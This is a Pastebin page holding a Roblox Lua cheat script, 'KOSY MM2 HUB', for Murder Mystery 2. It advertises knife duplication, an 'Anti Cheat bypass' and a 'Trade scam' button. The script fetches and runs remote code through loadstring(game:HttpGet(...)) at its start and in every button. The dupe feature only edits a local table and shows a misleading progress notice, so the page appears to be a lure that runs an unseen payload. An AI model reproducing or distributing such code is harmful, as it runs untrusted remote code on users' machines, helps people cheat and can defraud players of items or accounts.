Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- getgenv().gui = false
- loadstring(game:HttpGet("https://raw.githubusercontent.com/trdrock/mm2/main/Hub", true))()
- local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
- local Window = OrionLib:MakeWindow({Name = "KOSY MM2 HUB😈😈 - v6.3", HidePremium = false, IntroText = "MM2 Gui - v6.3", IntroIcon = "", SaveConfig = true, ConfigFolder = "MM2 SCRIPT"})
- local Tab = Window:MakeTab({
- Name = " Main",
- Icon = "",
- PremiumOnly = false
- })
- local Section = Tab:AddSection({
- Name = "Best MM2 duplicator has working feautures! Like dupe and visual knifes!!!!"
- })
- local Section = Tab:AddSection({
- Name = "New script! Come tap in with us for the low low😉😉."
- })
- local Tab = Window:MakeTab({
- Name = " function",
- Icon = "",
- PremiumOnly = false
- })
- local Section = Tab:AddSection({
- Name = "Free access"
- })
- Tab:AddButton({
- Name = "Trade scam ً",
- Callback = function()
- loadstring(game:HttpGet("https://pastebin.com/raw/8FZt3TsF"))()
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- Tab:AddButton({
- Name = "Anti Cheat bypass",
- Callback = function()
- loadstring(game:HttpGet("https://pastebin.com/raw/8FZt3TsF"))()
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- local Section = Tab:AddSection({
- Name = "Knife duplicator"
- })
- Tab:AddTextbox({
- Name = "Put your knife rarity",
- Default = "",
- TextDisappear = true,
- Callback = function(Value)
- fromPet = Value
- end
- })
- Tab:AddTextbox({
- Name = "Put your knife dupe name",
- Default = "",
- TextDisappear = true,
- Callback = function(Value)
- toPet = Value
- end
- })
- Tab:AddButton({
- Name = "Start Change!",
- Callback = function()
- local Library = require(game.ReplicatedStorage.Library)
- local Save = Library.Save.Get().Inventory
- local Directory = Library.Directory
- for i,v in pairs(Directory.Pets[fromPet]) do
- Directory.Pets[fromPet][i] = nil
- end
- for i,v in pairs(Directory.Pets[toPet]) do
- Directory.Pets[fromPet][i] = v
- end
- end
- })
- local Tab = Window:MakeTab({
- Name = " auto farm",
- Icon = "",
- PremiumOnly = false
- })
- local Section = Tab:AddSection({
- Name = " Free auto farm"
- })
- Tab:AddButton({
- Name = "KNIFE DUPE",
- Callback = function()
- loadstring(game:HttpGet("https://pastebin.com/raw/8FZt3TsF"))()
- end
- })
- OrionLib:MakeNotification({
- Name = "Duping Guns takes a while so be patient",
- Content = "Duping is in process-[Takes around 1-5 minutes]-Depending on your device!",
- Image = "rbxassetid://4483345998",
- Time = 120
- })
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement